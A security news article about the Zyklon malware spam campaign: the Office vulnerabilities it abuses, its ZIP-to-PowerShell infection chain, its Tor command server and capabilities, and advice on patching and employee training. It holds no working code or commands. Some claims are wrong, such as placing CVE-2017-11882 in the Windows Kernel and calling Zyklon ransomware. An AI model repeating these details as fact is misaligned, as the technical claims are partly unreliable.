Zyklon malware exploits three Microsoft Office vulnerabilities

Zyklon malware targets telecommunication, financial and insurance industries by exploiting MS Office vulnerabilities

First discovered in 2016, Zyklon malware^[1] was noticed spreading via malicious spam emails in January 2018. New malspam campaign targets companies that provide financial, insurance and telecommunication services.

According to the FireEye research data,^[2] malware takes advantage of three flaws in Microsoft Office:

• CVE-2017-8759 which is used for tricking user into opening an obfuscated file;
• CVE-2017-11882 (RCE vulnerability) which allows downloading malicious content to the targeted device;
• Dynamic Data Exchange Protocol (DDE) which helps attackers to perform remote code execution.

What is interesting that CVE-2017-11882 vulnerability is the same 17-year-old programming error in Windows Kernel^[3] which was finally patched in November 2017. However, companies often do not rush with the installation of recommended updates in order to strengthen cyber security and to avoid cyber attacks; and criminals are aware of that.

Emails with Zyklon have ZIP attachment

Cyber criminals launched a malspam campaign that tricks company workers into opening an obfuscated ZIP archive attached to the email. The archive includes a DOC file which is designed to exploit previously mentioned MS Office vulnerabilities and runs PowerShell script to download and execute Zyklon on the system.

Once executed, malware establishes the connection with its Command and Control (C&C) server using Tor network. C&C server can respond with specific tasks that malware has to perform. These tasks might include:

• launching various types of DDoS attacks;
• keylogging;
• stealing passwords saved on web browsers;
• install needed plugins for crypto-currency mining.

One of the interesting features of the ransomware is the ability to self-update and remove itself if needed. However, expecting that malware can delete itself without getting what creators want should not be expected.

Installing patches and educating employees are important to prevent malware infiltration

The majority of companies overlook an important security tip – to keep software and operating system up-to-date. Outdated programs might have flaws that can be exploited by cyber criminals in order to compromise systems and networks.^[4]

As we have mentioned at the beginning, Zyklon malware takes advantage of the vulnerabilities that were patched a couple of months ago. Therefore, companies can avoid the attack by installing them.

Additionally, it’s also important to educate employees in order to decrease the risk of opening a malicious email attachment. Criminals are good in social engineering and create convincing and legit-looking emails. Thus, users open attached archives or documents without suspect anything harmful.

The first sign that email might be dangerous and contain harmful content is its appearance in the spam folder.^[5] Furthermore, users are advised to look up for grammar mistakes, check information about the sender, and scan the attachment with online file scanners before opening them.